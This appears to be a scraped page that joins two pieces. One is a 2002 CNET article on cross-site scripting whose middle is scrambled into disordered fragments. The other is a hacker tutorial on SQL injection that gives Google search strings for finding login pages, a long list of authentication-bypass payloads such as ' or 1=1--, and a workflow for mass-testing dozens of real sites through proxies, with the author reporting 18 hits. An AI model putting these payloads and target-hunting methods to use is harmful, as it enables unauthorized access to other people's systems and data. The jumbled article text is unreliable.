Here's one more trick up hackers' sleeves Even if hackers can't hijack your computer, they can still

gain access to your personal info--and your Web e-mail--through something called crosssite scripting. Robert tells you the best way to protect yourself.

By Robert Vamosi Senior associate editor, CNET Reviews (7/25/02)
In the early days of the Internet, Web pages were flat. Now, they are dynamic, often created on the fly and customized to incorporate your preferences. For example, Travelocity offers information about travel to and from destinations you choose each time you visit the site. The advantages of dynamic pages are many: content is fresher, easier to maintain, and easier to navigate. Unfortunately, some dynamic Web sites also expose you to cross-site scripting (XSS), a method of capturing personal information that's becoming increasingly popular with malicious users. While buffer overflows offer malicious users a way to take control of your computer, XSS rarely causes your system to be hijacked. Rather, XSS is an indirect way for a malicious attacker to fool you into revealing personal information or to exploit a secondary vulnerability on your desktop browser or within a Web site's server. XSS allows malicious users to hijack your Web-based e-mail accounts, manipulate your customer settings on a site, or steal information sent in cookies, which may include your bank account, credit card, or social security number.

Let's look at cookie theft, since cookies are so widely used. Cookies are small packets of information shared between your desktop (the client) and a Web site (the server).

Cookies are not necessarily dangerous. They allow sites such as Amazon to recognize you when you visit the site and offer personalized recommendations for products you may want to buy. By storing your password and ID, cookies allow you to automatically log on to your online bank or stock-trading site. Cookies are site-specific; for example, BigStore.com can't

XSS is a way for a malicious attacker to fool you into revealing personal information.

0x003A. Also. For example. but that will restrict the number of sites you can visit. Since your browser might recognize the spoofed site as a trusted site--it thinks it's the same as the legit site--the malicious user could. you should set your security levels to High. . In a recent white paper (click here to download the PDF file). believing that any string of information following must be legit.access your cookies from LittleStore. Endler says future XSS exploits could easily be automated. Many of us--if we ever really look at the contents of a URL--tend to stop at the http://. accepting or denying them individually. nor can a malicious user view all the cookies stored on your desktop. 0x002F. If you use Microsoft's Internet Explorer. these are sent in e-mail messages. Most attack methods these days require malicious users to be sitting at a terminal. you can see that they include malicious Web addresses. Cookies for financial sites tend to be encrypted. 0x0070. with a well-crafted script. a malicious user could set up a script that would send him or her e-mail whenever you access your Webbased e-mail account. so http:// would become 0x0068. who lets loose his or her virus and then sits back and waits days or weeks for the damage to be done. 0x002F. however. Your browser (and your cookie info) are then sent to a third-party site that looks just like the legitimate one. but otherwise. But all of these will inconvenience you and may not even prevent an attack. Often. a malicious URL could be coded in HEX. They may appear to be legitimate URLs. while those for e-commerce sites tend not to be. Malicious users also trick us by hiding URLS in Web pages so that they look like standard hotlinks--until you click the link or view the page's source code. the trick is to redirect your personal information to a third-party site that he or she can access. David Endler of iDefense Labs. Indeed. Another way attackers gain access to your personal information is to create a popup asking you to reenter your username and password after you've already logged on to a legitimate Web site. You also can monitor all your cookie transactions. thinks this won't always be the case. For an attacker. So what can you do to protect yourself? You can turn off your browser's JavaScript. but it's a fake that the malicious user can access. be wary of clicking URLs from people or sites you do not know or trust. as opposed to a virus writer. run potentially damaging code on your computer. the URL would look like the address for search-engine results. but on closer examination. 0x0074. waiting for you to open yourself up to harm. One popular method is to use malicious links. 0x0074.com.

The information might not be going to the source you intended.finding one thats vulnerable is another question WHAT I DO : first let me go into details on how i go about my research i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs. My advice: be careful where you click. SQL injection Basic Tutorial One of the major problems with SQL is its poor security issues surrounding is the login and url strings.What is needed is more protection on the sites themselves.org "thanks mate" .legally cool. and to whom you give your username or password... http://governmentsecurity.asp with these two search string you will have plenty of targets to chose from. this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works If you are interested in this topic we have many articles related to SQL Injection also if you would like help with the topic you can ask in our information security forum where thousands of members can help you.. SEARCH: admin\login. gives me a chance to concentrate on what am doing and not be looking over my shoulder INJECTION STRINGS:HOW ? this is the easiest part. Be wary of clicking URLs from people or sites you do not know or trust..also an Astal member.very simple on the login page just enter something like user:admin (you dont even have to put this...provided by my good friend Gsecur aka ICE. with little regard for customer security.. when e-commerce sites were going online overnight. The good news is that the problem was much worse two or three years ago.) pass:' or 1=1-- ..... as well as better programming and application security on the server side.asp login.

.asp like this: index of login.com/search?hl=en&ie=ISO. the list below is a sample of the most common used there are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.google.or user:' or 1=1-admin:' or 1=1-some sites will have just a password so password:' or 1=1-infact i have compiled a combo list with strings like this to use on my chosen targets ...it dont have to be admin can be anything you want.so i tend to search say google for login.but thats another paper the one am interested in are quick access to targets PROGRAM i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way... the most important part is example:' or 1=1-.this is our injection string now the only trudge part is finding targets to exploit.asp or whatever inurl:login....asp result: http://www3.G=Google+Search string ?? ...there are plenty of strings about .asp index of:/admin/login....yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go thought 40 sites cutting and pasting each combo example: admin:' or a=a-admin:' or 1=1-and so on.

.thing is it saves quite a bit of time going to each site and each string to find its not exploitable..000 possible targets trying various searches spews out plent more now using proxys set in my browser i then click through interesting targets..asp http://www...my ISP...thing is i know it works for me...another.seeing whats what on the site pages if interesting i then cut and paste url as a possible target.somesite.asp and so on.in a couple of hours you can build up quite a list.now i dont want to go into problems with users using Ares......plus atm am on dial-up so to slow for me i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list.any target vulnerable with show up in the hits box.just as quick as login process (Variations) admin'-' or 0=0 -" or 0=0 -or 0=0 -- ...now when it finds a target it will spew all the strings on that site as vulnerable.reason i dont sellect all results or spider for login pages is i want to keep the noise level low....really i need a program that will return the hit with a click on url and ignore false outputs am still looking. sit back and wait. there you go you should have access to your vulnerable target by now another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-.....so it becomes user=' or 1=1-..after an hour or so you have a list of sites of potential targets like so http://www.com/login..com/admin/login..you have to go through each one on the site by cutting and pasting the string till you find the right one.17...start....but the thing is you know you CAN access the site . well enough said.

' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-" or 1=1-or 1=1-' or a=a-" or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a happy hunting ComSec aka ZSL .

Sign up to vote on this title
UsefulNot useful